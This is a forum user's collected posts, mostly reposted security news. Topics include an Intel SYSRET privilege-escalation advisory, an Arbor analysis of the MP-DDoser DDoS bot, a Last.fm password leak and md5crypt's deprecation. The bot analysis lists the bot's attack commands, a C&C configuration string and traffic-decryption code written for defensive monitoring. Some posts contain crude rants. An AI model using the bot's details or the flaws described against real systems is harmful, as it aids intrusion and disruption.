Everything posted by me.mello

  1. Who would have thought, Intel... or hardware in general... 32-bit systems are safe for now... but 64-bit ones are generally vulnerable.

     SYSRET 64-bit operating system privilege escalation vulnerability on Intel CPU hardware

     The U.S. Computer Emergency Readiness Team (US-CERT) has disclosed a flaw in Intel chips that could allow hackers to gain control of Windows and other operating systems. The flaw has already been exploited on 64-bit versions of Microsoft Windows 7, FreeBSD, NetBSD and there's a chance Apple's OS X may also be vulnerable. The vulnerability was disclosed in a security advisory released this week. Attackers could execute malicious code via kernel privileges or launch a local privilege escalation attack. VMware's virtualization software is not affected, and neither are AMD's processors, as they do not use the SYSRET instruction whose incorrect handling causes the flaw or handle it differently. Many of the affected vendors have already pushed out an update that defuses the flaw.

     Ref: Intel CPU Vulnerability can provide control of your system to attacker | The Hacker News

     Overview

     Some 64-bit operating systems and virtualization software running on Intel CPU hardware are vulnerable to a local privilege escalation attack. The vulnerability may be exploited for local privilege escalation or a guest-to-host virtual machine escape. Intel claims that this vulnerability is a software implementation issue, as their processors are functioning as per their documented specifications. However, software that fails to take the Intel-specific SYSRET behavior into account may be vulnerable.

     Description

     A ring3 (Ring (computer security) - Wikipedia, the free encyclopedia) attacker may be able to specifically craft a stack frame to be executed by ring0 (kernel) after a general protection exception (#GP). The fault will be handled before the stack switch, which means the exception handler will be run at ring0 with an attacker's chosen RSP, causing a privilege escalation.

     Details from Xen

     CVE-2012-0217 / XSA-7 - 64-bit PV guest privilege escalation vulnerability ([Xen-announce] Xen Security Advisory 7 (CVE-2012-0217) - PV privilege escalation)

     A vulnerability which can allow a 64-bit PV guest kernel running on a 64-bit hypervisor to escalate privileges to that of the host by arranging for a system call to return via sysret to a non-canonical RIP. Intel CPUs deliver the resulting exception in an undesirable processor state.

     Details from FreeBSD

     FreeBSD-SA-12:04.sysret: Privilege escalation when returning from kernel http://security.freebsd.org/advisories/FreeBSD-SA-12:04.sysret.asc

     FreeBSD/amd64 runs on CPUs from different vendors. Due to varying behaviour of CPUs in 64 bit mode a sanity check of the kernel may be insufficient when returning from a system call. Successful exploitation of the problem can lead to local kernel privilege escalation, kernel data corruption and/or crash.

     Details from Microsoft

     User Mode Scheduler Memory Corruption Vulnerability - MS12-042 - Important (Microsoft Security Bulletin MS12-042 - Important: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2711167))

     An elevation of privilege vulnerability exists in the way that the Windows User Mode Scheduler handles system requests. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full administrative rights.

     Mitigating Factors for User Mode Scheduler Memory Corruption Vulnerability

     Mitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:

       • An attacker must have valid logon credentials and be able to log on locally to exploit this vulnerability. The vulnerability could not be exploited remotely or by anonymous users.
       • This vulnerability only affects Intel x64-based versions of Windows 7 and Windows Server 2008 R2.
       • Systems with AMD or ARM-based CPUs are not affected by this vulnerability.

     Details from Red Hat

     RHSA-2012:0720-1 https://rhn.redhat.com/errata/RHSA-2012-0720.html & RHSA-2012:0721-1 https://rhn.redhat.com/errata/RHSA-2012-0721.html :

     It was found that the Xen hypervisor implementation as shipped with Red Hat Enterprise Linux 5 did not properly restrict the syscall return addresses in the sysret return path to canonical addresses. An unprivileged user in a 64-bit para-virtualized guest, that is running on a 64-bit host that has an Intel CPU, could use this flaw to crash the host or, potentially, escalate their privileges, allowing them to execute arbitrary code at the hypervisor level. (CVE-2012-0217, Important)

     Details from some affected vendors were not available at the time of publication.

     Impact

     A local authenticated attacker may exploit this vulnerability for operating system privilege escalation or for a guest-to-host virtual machine escape.

     Solution

     Apply an Update

     Please review the Vendor Information section of this document for vendor-specific patch and workaround details.

     Vendor Information:

     Vendor                | Status       | Date Notified | Date Updated
     ----------------------+--------------+---------------+-------------
     Citrix                | Affected     | -             | 18 Jun 2012
     FreeBSD Project       | Affected     | 01 May 2012   | 12 Jun 2012
     Intel Corporation     | Affected     | 01 May 2012   | 13 Jun 2012
     Joyent                | Affected     | -             | 14 Jun 2012
     Microsoft Corporation | Affected     | 01 May 2012   | 18 Jun 2012
     NetBSD                | Affected     | 01 May 2012   | 08 Jun 2012
     Oracle Corporation    | Affected     | 01 May 2012   | 08 Jun 2012
     Red Hat, Inc.         | Affected     | 01 May 2012   | 12 Jun 2012
     SUSE Linux            | Affected     | 02 May 2012   | 12 Jun 2012
     Xen                   | Affected     | 02 May 2012   | 12 Jun 2012
     AMD                   | Not Affected | -             | 13 Jun 2012
     Apple Inc.            | Not Affected | 01 May 2012   | 08 Jun 2012
     VMware                | Not Affected | 01 May 2012   | 08 Jun 2012
     Debian GNU/Linux      | Unknown      | 02 May 2012   | 02 May 2012
     Fedora Project        | Unknown      | 02 May 2012   | 02 May 2012

     Source: US-CERT Vulnerability Note VU#649219 - SYSRET 64-bit operating system privilege escalation vulnerability on Intel CPU hardware
  2. Banks are not as secure as they seem... most of them use Windows for their employees, and in general there aren't enough people capable of securing them.
  3. If this no longer works, https://rstcenter.com/forum/46717-rst-who-fuck.rst, set yourselves on fire!!!
  4. Title: How to Restrict the Use of Certain Cryptographic Algorithms and Protocols in Schannel.dll

     I won't take that kind of liberty with MS; the article is below, it will be corrected whenever they think it is needed, it will not be deleted, and besides it is very well described as it is.

     Source: How to Restrict the Use of Certain Cryptographic Algorithms and Protocols in Schannel.dll
     Ref: http://www.mozilla.org/projects/security/pki/nss/ssl/draft302.txt
  5. Man, these Romanians, bro, it's like planting a turd on a scorching day... all the flies fall into the trap :))
  6. me.mello

    YM problems?

    Restart the PC. Believe it or not, Internet Explorer is what causes this; restart and it recovers on its own.
  7. Oracle says (Oracle Java Critical Patch Update - June 2012) it will be patching fourteen vulnerabilities in Java SE (Standard Edition) this coming Tuesday, 12 June. All versions of Java, including the JDK and JRE version 7 update 4 and earlier, version 6 update 32 and earlier, version 5 update 35 and earlier, 1.4_2_37 and earlier, and JavaFX 2.1 and earlier are affected. The company says that it will be strongly recommending that all users apply the patch update "due to the threat posed by a successful attack".

     Oracle says the highest CVSS base score of the vulnerabilities is 10.0. Twelve of the vulnerabilities may be exploited remotely without any authentication. The problems all reside in the Java Runtime Environment (JRE).
  8. This blog post is the fifth installment in our ongoing series of articles surveying the crypto systems used by different DDoS-capable malware families. Today’s topic is MP-DDoser, also known as “IP-Killer”.

     As far as we are aware, MP-DDoser was first documented in February 2012 by Arbor analyst Curt Wilson in his pioneering survey of modern DDoS threats (Attack of the Shuriken: Many Hands, Many Weapons | DDoS and Security Reports | Arbor Networks Security Blog). Like many of the malware families we see these days, MP-DDoser is exclusively a DDoS bot; it has no ability to do key-logging, info-stealing, spamming, or other such mayhem.

     We started seeing the first MP-DDoser samples back in December 2011, which billed themselves as “Version 1.0”. These early versions had a number of serious flaws, such as a completely broken Slowloris attack implementation, and really awful crypto key management. But the latest samples (now up to “Version 1.6”) are much improved; the key management is quite good, and the buggy DDoS attacks are not only fixed, but now include at least one technique (“Apache Killer”) that may be considered reasonably cutting edge.

     The full details of our analysis are included in the attached report: http://ddos.arbornetworks.com/uploads/2012/06/Crypto-MPDDOS-Report.pdf, but here are the highlights:

     In addition to a Slowloris-style attack and various generic flooding capabilities, the newest versions of MP-DDoser support an ApacheKiller-style attack (Apache Killer (killapache.pl) Attack – Denial of Service Flaw in Apache WebServer), which is a relatively new (and sophisticated) low-bandwidth technique for inflicting denial-of-service attacks against Apache web servers. It first appeared in the form of a proof-of-concept Perl script (Full Disclosure: Apache Killer) in August 2011. Then toward the end of 2011 we saw a version of it incorporated into the Armageddon DDoS bot http://ddos.arbornetworks.com/2012/03/its-2012-and-armageddon-has-arrived/; however that implementation turned out to be severely flawed. Now, we are seeing it show up in MP-DDoser – and a review of the bot’s assembly code indicates that it does indeed appear to be a fully functional, working implementation of the Apache Killer attack. The core of the attack involves the sending of a very long Range HTTP header that is intended to bring web servers (especially Apache) to their knees by forcing them to do a great deal of server-side work in response to a comparatively small request. It is therefore one of the more effective low-bandwidth, “asymmetrical” HTTP attacks at the moment.

     The complete MP-DDoser command code vocabulary is as follows:

     Command Code | Function
     -------------+--------------------------------------------------------------------------------------
     PP           | Ping bot, which echoes PP back to C&C
     TC           | Similar to PP, but echoes back with TP
     KC           | Kill bot client process via ExitProcess()
     UN           | Uninstall
     BK           | Scan for IRC, IM, Skype processes
     STF          | Stop all flooding operations
     DL           | Download via URLDownloadToFile() and run via ShellExecute() a new malware binary
     SFUDP        | Start UDP Flood
     SFHTTP       | Start HTTP Flood
     SFSL         | Start Slowloris Flood
     SFBWD        | Start “Bandwidth” Flood
     SFL7         | Start Layer 7 attack
     SFARME       | Start Apache Range Flood (“Apache Killer”)

     Besides being armed with some potent DDoS weaponry, MP-DDoser is also interesting because of the multiple layers of encryption it uses for key management in order to secure its network communications. Again, the full details are provided in the attached report, but the high-level summary is as follows:

     The malware actually uses a pretty straightforward algorithm for encrypting and decrypting the transmissions sent between bot and C&C server. It modulates the plaintext message with a key string using the XOR operator, but it applies this XOR operation only to the least significant 4 bits of each message byte. The following Python snippet replicates MP-DDoser’s network crypting functionality:

         def decrypt_mpddos_comms(msg_text, key_text):
             # XOR only the low 4 bits of each message byte with the key byte;
             # the high 4 bits pass through unchanged.
             key_bytes = [ord(key_byte) for key_byte in key_text]
             msg_bytes = [ord(msg_byte) for msg_byte in msg_text]
             len_key = len(key_bytes)
             return ''.join([chr((msg_byte & 0xf0) +
                                 ((msg_byte & 0x0f) ^ (key_bytes[k % len_key] & 0x0f)))
                             for k, msg_byte in enumerate(msg_bytes)])

     The tricky part is finding the key string! In earlier versions of MP-DDoser, circa late 2011, this key string was simply hard-coded into the bot executable in plain text. But since then, MP-DDoser has improved rapidly on the key management front. Now the key string itself is encrypted and stored in an RCDATA resource named MP, along with some other sensitive information such as the hostname and port of the C&C, the botnet ID, etc.

     Furthermore, the algorithm used for decrypting this resource string is different from the aforementioned algo used for crypting the actual communications. The resource decryption mechanism appears to be a “home brew” algorithm. The details are in the report, but the algorithm can be summarized by the following Python snippet:

         def decrypt_mpddos_rsrc(rsrc_crypt, plain_lut):
             # accum_A counts buffered bits, accum_B holds them; each input
             # character contributes 6 bits via its position in the lookup table.
             accum_A = accum_B = 0
             plain_rsrc = []
             for rsrc_byte in rsrc_crypt:
                 next_byte = plain_lut.index(rsrc_byte)
                 accum_B = next_byte + (accum_B << 6)
                 accum_A += 6
                 if accum_A >= 8:
                     accum_A -= 8
                     plain_rsrc += [(accum_B >> accum_A)]
                     accum_B %= (1 << accum_A)
             return ''.join([chr(dstbyte) for dstbyte in plain_rsrc])

     To decrypt the MP resource string, the bot uses a lookup table (“LUT”) that maps ASCII characters to integers for the initial phase of the decryption loop. But even this lookup table is itself encrypted! Fortunately, it is encrypted using the same algorithm used for crypting the network comms, and thus the aforementioned decrypt_mpddos_comms() Python function will handle it. And mercifully, the key string needed to decrypt the LUT happens to be stored in plain text in the bot executable. In all the samples that we’ve encountered to date, that key string is: 00FF00FF00FF, but that could easily change in the future.

     So in order to decrypt MP-DDos transmissions, one needs to:

       1. Decrypt the LUT using decrypt_mpddos_comms();
       2. Then use the LUT to decrypt the MP resource via decrypt_mpddos_rsrc();
       3. Then pull the comms key from the plain text resource and provide it to decrypt_mpddos_comms() to decrypt the actual network traffic.

     The attached diagram illustrates the process:

     On top of all that, the bot binary itself is doubly packed using UPX followed by a .Net-based crypter. The author of MP-DDoser has clearly spent some time trying to beef up operational security.

     We have put all the pieces together into an “auto-ripper” tool that tears apart a memory dump of each MP-DDoser bot we encounter and extracts the three ingredients needed for traffic decryption (highlighted by yellow ovals in the above diagram) for use in our botnet monitoring operations. Once decrypted, the sensitive MP resource ends up being a pipe-delimited string containing C&C host, C&C port, network comms key, installation mutex, installation filename, botnet ID, etc. For example:

         tgm991.no-ip.info|3030|ipkillerpassword|IPK-MPMutex|-1|Not Available| Windefender.exe|Windefender|IPK-Victim|0|

     Applying this information to live MP-DDoser traffic yields transmissions formatted as follows (with some information modified to protect the parameters of our sandbox machines of course):

     Encrypted Bot Phone Home Transmission:

         0x0000 48 47 7e 41 67 65 60 75 68 77 49 3c 2f 33 75 4d HG~Age`u hwIq Vlg`mrq#
         0x0030 59 50 24 7b 31 3b 7d YP${1;}

     Decrypted Transmission:

         AC|Default@1.6|Idle...|Hawkeye@Mash4077|Windows XP x86|

     The AC stands for “Add Client”; Default corresponds to the botnet ID, and 1.6 is the MP-DDoser version. The remainder of the phone home message contains the usual information, such as bot status (Idle), and username, computer name, and operating system of the infected machine.

     All in all, MP-DDoser uses some of the better key management we have seen. But of course, at the end of the day, every bot has to contain – or be able to generate – its own key string in order to communicate with its C&C, so no matter how many layers of encryption our adversary piles on, they can always be peeled off one by one.

     The complete reverse engineering report for this version of MP-DDoser is available here: http://ddos.arbornetworks.com/uploads/2012/06/Crypto-MPDDOS-Report.pdf

     To summarize, the MP-DDoser code base is clearly being actively developed, and is improving rapidly on both the attack/flooding capability and network crypto fronts. We will keep monitoring this evolving DDoS threat in order to stay one step ahead of it – and use the intel we gather to continue defending our customers.

     Source: MP-DDoser: A rapidly improving DDoS threat | DDoS and Security Reports | Arbor Networks Security Blog

     I ask an admin/mod to move this to Programming or English Tutorials if they feel this is not the right place for it, but I don't think that's the case.
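The three decryption steps listed in the MP-DDoser post above, run end to end as an added example (not code from the post, from Arbor's report or from their auto-ripper tool). The 64-symbol lookup table, the `encode_rsrc` helper, the field positions and the "captured" payload are assumptions constructed for the demo; the two decrypt routines, the LUT key, the sample resource string and the `AC|` phone-home prefix come from the post.

```python
LUT_KEY = "00FF00FF00FF"  # plain-text LUT key quoted in the post
# Decrypted MP resource string quoted in the post (used here to build a sample)
SAMPLE_RSRC = ("tgm991.no-ip.info|3030|ipkillerpassword|IPK-MPMutex|-1|Not Available|"
               " Windefender.exe|Windefender|IPK-Victim|0|")
PHONE_HOME = "AC|Default@1.6|Idle...|Hawkeye@Mash4077|Windows XP x86|"
# Constructed lookup table for the demo; NOT the bot's real table
DEMO_LUT = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"[::-1]


def decrypt_mpddos_comms(msg_text, key_text):
    """Low-nibble XOR from the post; applying it twice restores the input."""
    key = [ord(c) & 0x0F for c in key_text]
    return "".join(chr((ord(c) & 0xF0) | ((ord(c) & 0x0F) ^ key[i % len(key)]))
                   for i, c in enumerate(msg_text))


def decrypt_mpddos_rsrc(rsrc_crypt, plain_lut):
    """Resource decoder from the post: 6-bit symbols repacked into bytes."""
    bits = acc = 0
    out = []
    for ch in rsrc_crypt:
        acc = plain_lut.index(ch) + (acc << 6)  # ValueError if ch is not in the LUT
        bits += 6
        if bits >= 8:
            bits -= 8
            out.append(chr(acc >> bits))
            acc %= 1 << bits
    return "".join(out)


def encode_rsrc(plain, plain_lut):
    """Hypothetical inverse of decrypt_mpddos_rsrc, used only to build the sample."""
    bits = acc = 0
    out = []
    for ch in plain:
        acc = (acc << 8) | ord(ch)
        bits += 8
        while bits >= 6:
            bits -= 6
            out.append(plain_lut[(acc >> bits) & 0x3F])
        acc &= (1 << bits) - 1
    if bits:  # pad the last partial symbol with zero bits
        out.append(plain_lut[(acc << (6 - bits)) & 0x3F])
    return "".join(out)


def recover_config(enc_lut, enc_rsrc, lut_key=LUT_KEY):
    lut = decrypt_mpddos_comms(enc_lut, lut_key)             # step 1: decrypt the LUT
    if len(set(lut)) != 64:
        raise ValueError("LUT is not 64 distinct symbols; wrong LUT key?")
    fields = decrypt_mpddos_rsrc(enc_rsrc, lut).split("|")   # step 2: decode the resource
    # step 3: field positions taken from the post's sample string (assumption)
    return {"host": fields[0], "port": int(fields[1]), "comms_key": fields[2]}


def decode_traffic(payload, config):
    return decrypt_mpddos_comms(payload, config["comms_key"])


def same_high_nibbles(payload, known="AC|"):
    """Keyless, coarse pre-filter: the cipher never changes a byte's high nibble."""
    return len(payload) >= len(known) and all(
        (ord(p) & 0xF0) == (ord(k) & 0xF0) for p, k in zip(payload, known))


# Constructed inputs standing in for what would be ripped from a memory dump
ENC_LUT = decrypt_mpddos_comms(DEMO_LUT, LUT_KEY)
ENC_RSRC = encode_rsrc(SAMPLE_RSRC, DEMO_LUT)
CAPTURE = decrypt_mpddos_comms(PHONE_HOME, "ipkillerpassword")

if __name__ == "__main__":
    cfg = recover_config(ENC_LUT, ENC_RSRC)
    print(cfg)
    print(decode_traffic(CAPTURE, cfg))
    print(same_high_nibbles("HG~"))  # first three bytes of the post's hex dump
```

Because only the low nibble is keyed, the high nibbles of a captured payload can be compared against a known plaintext prefix before any key has been recovered; the check is loose and only useful for narrowing down candidate flows.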
  9. A list with several million passwords belonging to users of the music community site Last.fm (Last.fm - Listen to internet radio and the largest music catalogue online) has been posted on the internet. The site owners have posted a statement (Last.fm Passwort Sicherheits-Update – Last.fm) saying that the company is investigating the leak and that all users of the service should change their passwords immediately. This is the third major compromise of a popular web site's passwords in as many days.

     The H's associates at heise Security are in possession of a list containing approximately 2.5 million password hashes. Like the recently leaked data from eHarmony (eHarmony admits to leaking 1.5 million passwords - The H Security: News and Features), these are unsalted MD5 hashes that are trivial to crack in today's world of fast CPU and GPU hardware and specialised techniques such as using rainbow tables (Cheap Cracks - Of dictionaries and rainbows - The H Security: News and Features). At least one million of these hashes have already been cracked and the clear text passwords have also been posted on the internet. The hashes that were leaked from LinkedIn (LinkedIn passwords in circulation – Update - The H Security: News and Features) were generated using the SHA-1 algorithm.

     Users of the Last.fm service are advised to change their password immediately. Furthermore, it would be prudent for any users who have reused their passwords to change them on other web sites as well. The article Storing passwords in uncrackable form (Storing passwords in uncrackable form - The H Security: News and Features) at The H Security explains how server administrators can prevent passwords from being cracked this easily.

     Source: Millions of Last.fm passwords leaked - The H Security: News and Features
  10. Tell me, what would Meebo have been without YM or Live? Do you think it would have got the job done with ICQ?... Crap. As I said above, I'm fed up with Google... especially with Chrome... a piss full of bots with which they try to imitate every Windows program in the so-called extensions; now, with Google Drive and its 5 GB of storage, they want to take the wind out of the other companies' sails; in combination with Chrome tools for Google Drive you get a big pile of crap... Get rid of your Google accounts, damn it; whatever you do on that account is known. I've had MSN... now Live, for over 10 years, and now more than ever I feel extremely satisfied... at least I know my data is with Microsoft, not with a company that wants to hold the monopoly on free shits... things are never as free as they seem. And yes, I also have SkyDrive... Office online, webmail, Live Essentials... I can write on blogs from Writer, plus if I ever wanted to connect to something... I can do that with a great many services. As I said above, I hope with all my heart that Yahoo!! and Microsoft will see to it that these Google clowns are no longer allowed to use their services; I don't think anyone will stop using YM just because it doesn't work with this Google shit.
  11. NAME

      libuser.conf - configuration for libuser and libuser utilities

      FILE FORMAT

      libuser.conf is a text file. Leading and trailing white space on each line is ignored. Lines starting with # are ignored.

      The file defines variables grouped into sections. Each section starts with a section header:

          [section name]

      A single section header can appear more than once in the file. The lines following a section header define variables from that section:

          variable = value

      The value can be empty. A variable can have more than one value, specified by using more than one line defining that variable. All currently defined variables accept only the first value and ignore the others, if any.

      [defaults]

      create_modules
          A list of module names to use when creating user or group entries, unless the application specifies a different list. The module names in the list can be separated using space, tab or comma. Default value is files shadow.

      crypt_style
          The algorithm to use for password encryption when creating new passwords. The current algorithm may be retained when changing a password of an existing user, depending on the application. Possible values are des, md5, blowfish, sha256 and sha512, all case-insensitive. Unrecognized values are treated as des. Default value is des.

      hash_rounds_min, hash_rounds_max
          These variables specify an inclusive range of hash rounds used when crypt_style is sha256 or sha512. A number of hash rounds is chosen from this interval randomly. A larger number of rounds makes password checking, and brute-force attempts to guess the password by reversing the hash, more CPU-intensive. The number of rounds is restricted to the interval [1000, 999999999]. If only one of the above variables is specified, the number of rounds used is specified by the other variable. If neither variable is specified, the number of rounds is chosen by libc.

      mailspooldir
          The directory containing user’s mail spool files. Default value is /var/mail.

      moduledir
          The directory containing libuser modules. Default value uses the modules installed with libuser, corresponding to the architecture of the libuser library, e.g. /usr/lib/libuser or /usr/lib64/libuser (assuming libuser was configured with --prefix=/usr).

      modules
          A list of module names to use when not creating user or group entries, unless the application specifies a different list. The module names in the list can be separated using space, tab or comma. Default value is files shadow.

      skeleton
          The directory containing files to copy to newly created home directories. Default value is /etc/skel.

      [import]

      login_defs
          A path to the login.defs file from shadow. If this variable is defined, the variables from the named file are used in place of some libuser variables. Variables explicitly defined in libuser.conf are not affected by contents of login.defs. The following variables are imported:

          Variable             | Imported as
          ---------------------+-------------------------------
          ENCRYPT_METHOD       | defaults/crypt_style
          GID_MIN              | groupdefaults/LU_GIDNUMBER
          MAIL_DIR             | defaults/mailspooldir
          MD5_CRYPT_ENAB       | defaults/crypt_style
          PASS_MAX_DAYS        | userdefaults/LU_SHADOWMAX
          PASS_MIN_DAYS        | userdefaults/LU_SHADOWMIN
          PASS_WARN_AGE        | userdefaults/LU_SHADOWWARNING
          SHA_CRYPT_MIN_ROUNDS | defaults/hash_rounds_min
          SHA_CRYPT_MAX_ROUNDS | defaults/hash_rounds_max
          UID_MIN              | userdefaults/LU_UIDNUMBER

          The following variables are not imported: CREATE_HOME, GID_MAX, MAIL_FILE, SYSLOG_SG_ENAB, UID_MAX, UMASK, USERDEL_CMD, USERGROUPS_ENAB

      default_useradd
          A path to the default/useradd file from useradd in shadow. If this variable is defined, the variables from the named file are used in place of some libuser variables. Variables explicitly defined in libuser.conf are not affected by contents of default/useradd. The following variables are imported:

          Variable | Imported as
          ---------+--------------------------------
          EXPIRE   | userdefaults/LU_SHADOWEXPIRE
          GROUP    | userdefaults/LU_GIDNUMBER
          HOME     | userdefaults/LU_HOMEDIRECTORY
          INACTIVE | userdefaults/LU_SHADOWINACTIVE
          SHELL    | userdefaults/LU_LOGINSHELL
          SKEL     | defaults/skeleton

          The HOME variable value has /%n appended to it before importing.

      [userdefaults]

      This section defines attribute values of newly created user entities. There is one special variable:

      LU_UIDNUMBER
          A decimal number, the first allowed UID value for regular users (not system users). Default value is 500.

      All other variables have the same names as the attribute names from <libuser/entity.h> and define attribute values. Either the macro name (e.g. LU_GECOS) or the macro content (e.g. pw_gecos) can be used; if both are used, the one appearing later in the configuration file is used.

      The % character in the value of the variable introduces an escape sequence: %n is replaced by the user name, %d is replaced by current date in days since the epoch, %u is replaced by the user’s UID. There is no way to escape the % character and avoid this substitution.

      After the userdefaults section is processed, modules may define additional attributes or even override the attributes defined in this section.

      [groupdefaults]

      The groupdefaults section is similar to userdefaults. There is one special variable:

      LU_GIDNUMBER
          A decimal number, the first allowed GID value for regular groups (not system groups). Default value is 500.

      The other variables follow the same rules as in the userdefaults section, except that %n and %u are replaced by the group name and group’s GID, respectively.

      After the groupdefaults section is processed, modules may define additional attributes or even override the attributes defined in this section.

      [files]

      Configures the files module, which manages /etc/group and /etc/passwd. The configuration variables are probably useful only for libuser development.

      directory
          The directory containing the group and passwd files. Default value is /etc.

      nonroot
          Allow module initialization when not invoked as the root user if the value is yes.

      [shadow]

      Configures the files module, which manages /etc/gshadow and /etc/shadow. The configuration variables are probably useful only for libuser development.

      directory
          The directory containing the gshadow and shadow files. Default value is /etc.

      nonroot
          Allow module initialization when not invoked as the root user if the value is yes.

      [ldap]

      Configures the ldap module, which manages a user database accessible using LDAP.

      userBranch
          The LDAP suffix for user entities. Default value is ou=People.

      groupBranch
          The LDAP suffix for group entities. Default value is ou=Group.

      server
          A domain name or a URI of the LDAP server. The URI can use the ldap or the ldaps protocol. When a simple domain name is used, the connection fails if TLS can not be used; a URI using the ldap protocol allows connection without TLS. Default value is ldap.

      basedn
          The base DN of the server. Default value is dc=example,dc=com.

      binddn
          A DN for binding to the server. If the value is empty or binding using this DN fails, a DN of uid=user,userBranch,basedn is used, where userBranch and basedn are variables from this section and user is the user name of the invoking user, unless overridden by the user variable from this section. Default value is cn=manager,dc=example,dc=com.

      user
          The SASLv2 identity for authenticating to the LDAP server, also overrides the user name for generating a bind DN. Default value is the name of the invoking user.

      authuser
          The SASLv2 authorization user, if non-empty. Default value is empty.

      bindtype
          The list of bind types to use, separated by commas. Allowed bind types are simple, sasl, and sasl/mechanism, where mechanism is a SASL mechanism. The bind types (but not necessarily mechanism) are case-insensitive. If more than one bind type is specified, their relative order is ignored. Default value is simple,sasl.

      [sasl]

      Configures the sasl module, which manages a SASLv2 user database.

      appname
          Name of the SASLv2 application. Default value is empty.

      domain
          Domain used by libuser for the SASLv2 authentication object. Default value is empty.

      BUGS

      Invalid lines in the configuration file (or the imported shadow configuration files) are silently ignored.

      FILES

      /etc/libuser.conf
          The default location of the configuration file. Can be overridden by the LIBUSER_CONF environment variable, except in set-uid or set-gid programs.

      Source: Ubuntu Manpage: libuser.conf - configuration for libuser and libuser utilities
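An audit sketch for the libuser.conf format described above, added here as an example (it is not libuser's own parser and is written only from the man page text). It shows how the rules interact: a line with a missing `=` is silently dropped, so `crypt_style` falls back to its `des` default. Treating `des` and `md5` as findings is this example's assumption, and both sample files and the round counts in them are constructed.

```python
import re

KNOWN_STYLES = {"des", "md5", "blowfish", "sha256", "sha512"}
WEAK_STYLES = {"des", "md5"}             # assumption of this example
ROUNDS_LO, ROUNDS_HI = 1000, 999999999   # interval stated in the man page

# Constructed sample: line 3 lacks '=', so libuser would ignore it silently.
WEAK_CONF = """\
# constructed sample
[defaults]
crypt_style sha512
[ldap]
server = ldap://ldap.example.com
"""

# Constructed sample with the same intent written correctly.
HARDENED_CONF = """\
[defaults]
crypt_style = sha512
hash_rounds_min = 100000
hash_rounds_max = 200000
[ldap]
server = ldaps://ldap.example.com
"""


def parse_libuser_conf(text):
    """Return ({(section, variable): first value}, [(line number, ignored line)])."""
    values, ignored, section = {}, [], None
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()                   # leading/trailing white space is ignored
        if not line or line.startswith("#"):
            continue
        header = re.fullmatch(r"\[(.+)\]", line)
        if header:                           # a section may be reopened later in the file
            section = header.group(1).strip()
            continue
        name, sep, value = line.partition("=")
        if not sep or not name.strip() or section is None:
            ignored.append((lineno, line))   # invalid line: dropped without any error
            continue
        # only the first value given for a variable is used
        values.setdefault((section, name.strip()), value.strip())
    return values, ignored


def audit(text):
    """Return a list of human-readable findings for one configuration file."""
    values, ignored = parse_libuser_conf(text)
    findings = [f"line {n} ignored: {line!r}" for n, line in ignored]

    style = values.get(("defaults", "crypt_style"), "des").lower()
    if style not in KNOWN_STYLES:            # unrecognized values are treated as des
        style = "des"
    if style in WEAK_STYLES:
        findings.append(f"crypt_style resolves to {style}")
    elif style in ("sha256", "sha512"):      # rounds only apply to these two styles
        for var in ("hash_rounds_min", "hash_rounds_max"):
            raw = values.get(("defaults", var))
            if raw is None:
                continue
            if not raw.isdigit() or not ROUNDS_LO <= int(raw) <= ROUNDS_HI:
                findings.append(f"{var}={raw} outside [{ROUNDS_LO}, {ROUNDS_HI}]")

    # an ldap:// URI allows connection without TLS, per the [ldap] server entry
    if values.get(("ldap", "server"), "").lower().startswith("ldap://"):
        findings.append("ldap server URI allows connection without TLS")
    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit(conf))
```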
  12. THE AUTHOR of md5crypt(), which is used to encrypt passwords on some FreeBSD and Linux-based operating systems, has said it is no longer secure despite being recommended as a password hashing function.

      Poul-Henning Kamp implemented Ronald Rivest's MD5 one-way hashing algorithm in his md5crypt() function that has been in use on FreeBSD and Linux-based operating systems for many years. Now Kamp has been forced to say that md5crypt() is no longer secure (Md5crypt Password scrambler is no longer considered safe by author — PHKs Bikeshed) after he claimed that people were still recommending it for production use.

      While Kamp introduced extra functionality in md5crypt() to mitigate against brute-force attacks, processing power has increased to a point where Kamp said that md5crypt() is too fast on commercially available hardware. He told The INQUIRER, "[The] only problem with md5crypt is speed: it's too fast."

      Kamp also told The INQUIRER that it had been known for some time that md5crypt() could no longer provide adequate protection, but since people were still recommending the use of md5crypt() in production environments that forced him to make an announcement, urging people to stop using his creation.

      While MD5 was cracked using brute force methods back in 2005, Kamp included extra stages in md5crypt() such as salting to increase its computational complexity, and md5crypt() remained too processor intensive for brute force attacks for a while longer. However md5crypt() is the best part of two decades old by now and more computing power, especially with GPGPUs, has meant that hackers can execute md5crypt() on every combination of 10 letters and numbers in a matter of hours.

      All hashing algorithms eventually become susceptible to brute-force attacks due to advances in computational power. However the fact that Kamp has been forced to make such an announcement shows that bad practices are still far too common, and that can cost people in terms of security.

      Source: Even The Author Says md5crypt() Is No Longer Secure ≈ Packet Storm
  13. Get ready, there is a lot to read plus references, but there is plenty to learn: IPv6 is vulnerable, a vulnerability so big that an attacker can stop all the PCs on the network, Xbox, PS3, FreeBSD, Win8, with just one .html web page; a very well described presentation by Sam Bowne. Have fun.

Executive Summary

This is extremely dangerous! A single device can instantly stop all the Windows machines on a Local Area Network. In my tests, my Windows 7 virtual machine freezes totally and the only way to revive it is shutting the power off--an abnormal shutdown.

A student recorded this video, which makes it easier for people to quickly see the importance of the Windows IPv6 Router Advertisement vulnerability, without bothering with the technical details.

Imagine the effect of a single attacker on a small business, Internet coffeehouse, or any other LAN. This works on all Windows machines with IPv6 enabled, which includes Windows XP, Vista, Windows 7, Server 2008, and more. Mike Qaissaunee reported to me that it also stops X-Box and PS3 game consoles.

Suppose someone writes this into a malicious Web attack, so everyone who views a malicious Web page instantly kills all the machines on their LAN! As far as I know, this attack will not traverse routers, so it "only" affects your local broadcast domain. But isn't that enough to deserve a security alert and a patch? Apparently not. Microsoft has told me and Marc Heuse* that they don't intend to patch this.

Responsible Disclosure

I regarded this as too dangerous to discuss on the Internet, and sent it to Microsoft privately. However, they informed me that this is not a new attack--it has been publicly known for months:

